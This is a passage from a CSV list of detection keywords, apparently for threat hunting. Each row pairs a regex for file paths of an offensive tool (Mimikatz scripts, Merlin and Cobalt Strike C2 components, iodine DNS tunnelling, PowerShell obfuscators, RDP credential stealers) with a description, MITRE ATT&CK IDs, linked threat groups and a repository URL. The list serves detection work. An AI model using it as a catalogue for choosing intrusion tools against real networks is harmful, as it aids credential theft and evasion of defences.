"*/Inveigh-NTLMv2.txt*",".{0,1000}\/Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 
- T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8134" "*/Invisi-Shell.git*",".{0,1000}\/Invisi\-Shell\.git.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","8135" "*/invocation:tor.service*",".{0,1000}\/invocation\:tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8136" "*/Invoke-Adeleginator*",".{0,1000}\/Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","8137" "*/Invoke-ADEnum.git*",".{0,1000}\/Invoke\-ADEnum\.git.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","8138" "*/Invoke-ADSBackdoor.ps1*",".{0,1000}\/Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8139" "*/Invoke-ArgFuscator.git*",".{0,1000}\/Invoke\-ArgFuscator\.git.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8140" 
"*/Invoke-ArgFuscator/releases/*",".{0,1000}\/Invoke\-ArgFuscator\/releases\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8141" "*/Invoke-ArgFuscator/tarball/*",".{0,1000}\/Invoke\-ArgFuscator\/tarball\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8142" "*/Invoke-ArgFuscator/zipball/*",".{0,1000}\/Invoke\-ArgFuscator\/zipball\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8143" "*/Invoke-Bof/*",".{0,1000}\/Invoke\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","8144" "*/Invoke-CleverSpray.git*",".{0,1000}\/Invoke\-CleverSpray\.git.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","8145" "*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","8146" "*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8147" "*/Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\/Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8148" "*/Invoke-EternalBlue.ps1*",".{0,1000}\/Invoke\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8149" "*/Invoke-ExcelMacroPivot.ps1*",".{0,1000}\/Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8150" "*/Invoke-HostEnum.ps1*",".{0,1000}\/Invoke\-HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","8151" "*/Invoke-InternalMonologue.ps1*",".{0,1000}\/Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8152" "*/Invoke-MDExclusionParser.ps1*",".{0,1000}\/Invoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","8154" "*/Invoke-Mimikatz.ps1*",".{0,1000}\/Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8155" "*/Invoke-MS16032.ps1*",".{0,1000}\/Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of 
hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8156" "*/Invoke-MS16135.ps1*",".{0,1000}\/Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8157" "*/Invoke-Obfuscation.git*",".{0,1000}\/Invoke\-Obfuscation\.git.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","8158" "*/Invoke-PowerThIEf.ps1*",".{0,1000}\/Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also 
known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8159" "*/Invoke-RDPThief.git*",".{0,1000}\/Invoke\-RDPThief\.git.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","8160" "*/Invoke-RunAs.ps1*",".{0,1000}\/Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8161" "*/Invoke-RunAsSystem.git*",".{0,1000}\/Invoke\-RunAsSystem\.git.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","8162" "*/Invoke-RunAsWithCert.git*",".{0,1000}\/Invoke\-RunAsWithCert\.git.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT 
authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","8163" "*/Invoke-SessionHunter.git*",".{0,1000}\/Invoke\-SessionHunter\.git.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","8164" "*/Invoke-SMBRemoting.git*",".{0,1000}\/Invoke\-SMBRemoting\.git.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","8165" "*/Invoke-SocksProxy.git*",".{0,1000}\/Invoke\-SocksProxy\.git.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","8166" "*/Invoke-SocksProxy/*",".{0,1000}\/Invoke\-SocksProxy\/.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - 
Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","8167" "*/Invoke-Stealth.git*",".{0,1000}\/Invoke\-Stealth\.git.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8168" "*/invoke-stealth.php*",".{0,1000}\/invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8169" "*/Invoke-Stealth.ps1*",".{0,1000}\/Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8170" "*/Invoke-WMILM.ps1*",".{0,1000}\/Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8171" "*/iodine-*-windows.zip*",".{0,1000}\/iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8173" "*/iodine.exe*",".{0,1000}\/iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8174" "*/iodine.git*",".{0,1000}\/iodine\.git.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8175" "*/iodine-master/*",".{0,1000}\/iodine\-master\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8176" "*/ionide *",".{0,1000}\/ionide\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8177" "*/io-tl/Mara*",".{0,1000}\/io\-tl\/Mara.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","8178" "*/IOXIDResolver.py*",".{0,1000}\/IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8179" "*/ip_spoof.rb*",".{0,1000}\/ip_spoof\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8180" "*/IPayloadService.*",".{0,1000}\/IPayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","8181" "*/ip-forwarding.nse*",".{0,1000}\/ip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8182" "*/IPfuscation.cpp*",".{0,1000}\/IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","8183" "*/IPfuscation.exe*",".{0,1000}\/IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","8184" "*/ip-geolocation-geoplugin.nse*",".{0,1000}\/ip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
